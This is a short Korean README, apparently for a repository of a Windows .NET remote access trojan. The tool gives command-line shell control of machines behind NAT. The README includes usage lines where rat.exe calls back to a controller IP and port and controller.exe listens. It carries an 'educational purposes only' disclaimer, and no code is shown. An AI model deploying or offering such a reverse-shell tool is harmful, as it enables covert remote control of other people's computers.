
Windows 원격 액세스 트로이 목마 (RAT)
Windows .NET 소켓을 이용한 원격 접속 트로이 목마 (RAT)
Windows에서 NAT 뒤에 있는 원격 머신을 명령줄 셸로 제어하기 위한 클라이언트-서버 바이너리 및 소스 코드입니다. 코어는 여러 RAT와의 통신을 지원하지만, 사용된 명령줄 인터페이스는 각 RAT를 구별하는 기능이 제한적입니다.
RAT 프로세스 실행 파일은 교육 목적으로만 개발되었기 때문에 작업 표시줄이나 작업 관리자에서 숨겨지지 않습니다. 악의적인 목적으로 사용하지 마십시오.
ILMerge를 사용하여 패키징된 소스 코드와 두 개의 바이너리를 포함합니다.
사용 방법:
서버를 RAT 역할로 명령줄에서 실행합니다 (Binaries\rat.exe) -> rat ip=[controller-ip-address] port=[controller-port-default-is-9999]
클라이언트를 컨트롤러 역할로 명령줄에서 실행합니다 (Binaries\controller.exe) -> controller ip=[listen-ip-address] port=[listen-port-default-is-9999]
controller.exe 인터페이스에서 명령을 입력합니다.